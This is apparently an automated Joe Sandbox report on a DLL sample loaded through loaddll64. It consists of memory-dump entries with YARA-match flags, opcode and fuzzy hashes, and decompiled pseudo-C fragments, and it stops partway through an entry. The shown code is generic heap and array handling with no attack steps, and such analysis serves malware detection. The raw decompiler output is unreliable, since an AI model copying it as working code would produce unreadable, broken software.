                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ]i
                                                                                                        • API String ID: 0-2057496602
                                                                                                        • Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                        • Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
                                                                                                        • Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                        • Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x{
                                                                                                        • API String ID: 0-1642613173
                                                                                                        • Opcode ID: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                        • Instruction ID: cfab1a828be9d4f11d62def22584f191cf8c0c6105b21f987aeed96694dfa2d1
                                                                                                        • Opcode Fuzzy Hash: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                        • Instruction Fuzzy Hash: 992126B55097849BE348DF28C08A51BBBE1BB9C31CF810B1DF4CAA7254D378D649CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC2890DD90(long long __rax) {
                                                                                                        				signed int _t3;
                                                                                                        
                                                                                                        				_t3 = GetProcessHeap();
                                                                                                        				 *0x2897f930 = __rax;
                                                                                                        				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                        			}




                                                                                                        0x7ffc2890dd94
                                                                                                        0x7ffc2890dd9d
                                                                                                        0x7ffc2890ddab

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                        • Instruction ID: dcd169a2302a5dc51a4873e694b796e557a547ac721673283c9f6abeb9d0778d
                                                                                                        • Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                        • Instruction Fuzzy Hash: 30B09220E17A1AC2EA483B216CC221422A5FF48702F88003AC60D60370DF3C20BA9724
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                        • Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
                                                                                                        • Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
                                                                                                        • Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                        • Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
                                                                                                        • Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
                                                                                                        • Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                        • Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
                                                                                                        • Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
                                                                                                        • Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                        • Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
                                                                                                        • Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
                                                                                                        • Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                        • Instruction ID: 5eec0bcf1fbba8724022678f8bc59fa4456f48bde8d20377bb611b2113970765
                                                                                                        • Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
                                                                                                        • Instruction Fuzzy Hash: 39412851F65BEA4BEE03AA7A5C127B00A00AFA77C2F41E332EE0B77B51DB1D5556C204
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 60%
                                                                                                        			E00007FFC7FFC2890A370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                        				void* _t24;
                                                                                                        				int _t26;
                                                                                                        				signed int _t51;
                                                                                                        				void* _t52;
                                                                                                        				signed long long _t66;
                                                                                                        				signed int* _t73;
                                                                                                        				signed long long _t75;
                                                                                                        				signed long long _t77;
                                                                                                        				signed long long _t78;
                                                                                                        				signed long long _t95;
                                                                                                        				signed long long _t96;
                                                                                                        				signed long long _t98;
                                                                                                        				signed long long _t104;
                                                                                                        				long long _t115;
                                                                                                        				void* _t117;
                                                                                                        				void* _t120;
                                                                                                        				signed long long* _t123;
                                                                                                        				signed long long _t124;
                                                                                                        				signed long long _t126;
                                                                                                        				signed long long _t129;
                                                                                                        				signed long long*** _t132;
                                                                                                        
                                                                                                        				_t52 = __edi;
                                                                                                        				_t51 = __edx;
                                                                                                        				 *((long long*)(_t117 + 0x10)) = __rbx;
                                                                                                        				 *((long long*)(_t117 + 0x18)) = _t115;
                                                                                                        				 *((long long*)(_t117 + 0x20)) = __rsi;
                                                                                                        				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                        				_t132 = __rcx;
                                                                                                        				_t73 =  *_t66;
                                                                                                        				if (_t73 == 0) goto 0x2890a504;
                                                                                                        				_t124 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				_t111 =  *_t73 ^ _t124;
                                                                                                        				asm("dec eax");
                                                                                                        				_t75 = _t73[4] ^ _t124;
                                                                                                        				asm("dec ecx");
                                                                                                        				asm("dec eax");
                                                                                                        				if ((_t73[2] ^ _t124) != _t75) goto 0x2890a476;
                                                                                                        				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
                                                                                                        				_t101 =  >  ? _t66 : _t77;
                                                                                                        				_t6 = _t115 + 0x20; // 0x20
                                                                                                        				_t102 = ( >  ? _t66 : _t77) + _t77;
                                                                                                        				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
                                                                                                        				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x2890a412;
                                                                                                        				_t7 = _t115 + 8; // 0x8
                                                                                                        				r8d = _t7;
                                                                                                        				E00007FFC7FFC2890D858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
                                                                                                        				_t24 = E00007FFC7FFC2890A9DC(_t66, _t111);
                                                                                                        				if (_t66 != 0) goto 0x2890a43a;
                                                                                                        				_t104 = _t77 + 4;
                                                                                                        				r8d = 8;
                                                                                                        				E00007FFC7FFC2890D858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
                                                                                                        				_t129 = _t66;
                                                                                                        				_t26 = E00007FFC7FFC2890A9DC(_t66, _t111);
                                                                                                        				if (_t129 == 0) goto 0x2890a504;
                                                                                                        				_t123 = _t129 + _t77 * 8;
                                                                                                        				_t78 = _t129 + _t104 * 8;
                                                                                                        				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                        				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                                                        				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x2890a476;
                                                                                                        				memset(_t52, _t26, 0 << 0);
                                                                                                        				_t126 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				r8d = 0x40;
                                                                                                        				_t14 =  &(_t123[1]); // 0x7ffc28901024
                                                                                                        				asm("dec eax");
                                                                                                        				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                        				_t95 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				asm("dec eax");
                                                                                                        				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                        				_t96 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				asm("dec eax");
                                                                                                        				( *( *_t132))[1] = _t14 ^ _t96;
                                                                                                        				_t98 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                        				asm("dec eax");
                                                                                                        				( *( *_t132))[2] = _t78 ^ _t98;
                                                                                                        				goto 0x2890a507;
                                                                                                        				return 0xffffffff;
                                                                                                        			}
























                                                                                                        0x7ffc2890a370
                                                                                                        0x7ffc2890a370
                                                                                                        0x7ffc2890a370
                                                                                                        0x7ffc2890a375
                                                                                                        0x7ffc2890a37a
                                                                                                        0x7ffc2890a388
                                                                                                        0x7ffc2890a38d
                                                                                                        0x7ffc2890a390
                                                                                                        0x7ffc2890a396
                                                                                                        0x7ffc2890a39c
                                                                                                        0x7ffc2890a3b4
                                                                                                        0x7ffc2890a3ba
                                                                                                        0x7ffc2890a3bd
                                                                                                        0x7ffc2890a3c0
                                                                                                        0x7ffc2890a3c3
                                                                                                        0x7ffc2890a3c9
                                                                                                        0x7ffc2890a3d7
                                                                                                        0x7ffc2890a3e1
                                                                                                        0x7ffc2890a3e5
                                                                                                        0x7ffc2890a3e8
                                                                                                        0x7ffc2890a3eb
                                                                                                        0x7ffc2890a3f2
                                                                                                        0x7ffc2890a3f4
                                                                                                        0x7ffc2890a3f4
                                                                                                        0x7ffc2890a3fe
                                                                                                        0x7ffc2890a408
                                                                                                        0x7ffc2890a410
                                                                                                        0x7ffc2890a412
                                                                                                        0x7ffc2890a416
                                                                                                        0x7ffc2890a422
                                                                                                        0x7ffc2890a429
                                                                                                        0x7ffc2890a42c
                                                                                                        0x7ffc2890a434
                                                                                                        0x7ffc2890a441
                                                                                                        0x7ffc2890a445
                                                                                                        0x7ffc2890a45d
                                                                                                        0x7ffc2890a461
                                                                                                        0x7ffc2890a464
                                                                                                        0x7ffc2890a46c
                                                                                                        0x7ffc2890a46f
                                                                                                        0x7ffc2890a476
                                                                                                        0x7ffc2890a47c
                                                                                                        0x7ffc2890a495
                                                                                                        0x7ffc2890a49b
                                                                                                        0x7ffc2890a49e
                                                                                                        0x7ffc2890a4b1
                                                                                                        0x7ffc2890a4ba
                                                                                                        0x7ffc2890a4c0
                                                                                                        0x7ffc2890a4d1
                                                                                                        0x7ffc2890a4da
                                                                                                        0x7ffc2890a4de
                                                                                                        0x7ffc2890a4ea
                                                                                                        0x7ffc2890a4f3
                                                                                                        0x7ffc2890a4fe
                                                                                                        0x7ffc2890a502
                                                                                                        0x7ffc2890a51f

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                        • Instruction ID: 9c6da8f38d8f9f80ad09ba1030d69deb075350a8f24711b0b4e4f5b70f6e29db
                                                                                                        • Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
                                                                                                        • Instruction Fuzzy Hash: 1241E322718A6882EF04DF2ADD1816973A1FB48FD4B499033DE4D8BB98DE3DD445C314
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                        • Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
                                                                                                        • Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
                                                                                                        • Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                        • Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
                                                                                                        • Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
                                                                                                        • Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                        • Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
                                                                                                        • Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
                                                                                                        • Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                        • Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
                                                                                                        • Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
                                                                                                        • Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                        • Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
                                                                                                        • Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
                                                                                                        • Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                        • Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
                                                                                                        • Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
                                                                                                        • Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                        • Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
                                                                                                        • Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
                                                                                                        • Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                        • Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
                                                                                                        • Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
                                                                                                        • Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                        • Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
                                                                                                        • Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
                                                                                                        • Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                        • Instruction ID: 6daa388222a5a84c7974237e422c02caa7ff578f64bce21c4d2575711bd59858
                                                                                                        • Opcode Fuzzy Hash: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
                                                                                                        • Instruction Fuzzy Hash: EB41D5B190074E8BDF48CF64C48A5DE7FB0FB68358F214618E855A6290D3B8D6A5CFC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                        • Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
                                                                                                        • Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
                                                                                                        • Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
